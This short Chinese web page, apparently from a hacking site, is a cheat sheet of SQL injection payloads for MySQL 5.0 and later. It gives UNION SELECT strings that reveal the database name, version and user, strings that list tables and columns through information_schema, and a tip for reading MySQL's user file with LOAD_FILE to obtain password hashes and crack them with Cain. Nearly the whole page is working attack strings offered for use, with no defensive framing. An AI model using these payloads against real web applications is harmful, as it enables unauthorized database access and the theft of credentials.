MYSQL5.0以上版本注入命令 -www.hackerschina.org
浏览数:37 /
时间:2015年06月12日
一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select
1,2,3,database(),5,version(),6,user(),7..../*
二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from
information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*
三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.....from
information_schema.COLUMNS where TABLE_NAME=表的HEX limit 1,1/*
关于找不到ROOT密码的爆破:
通过LOAD_FILE(‘‘C:\..\MYSQL\DATA\MYSQL\USER.MYD‘‘)得到用户的HASH散列,之后用CAIN爆破....
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
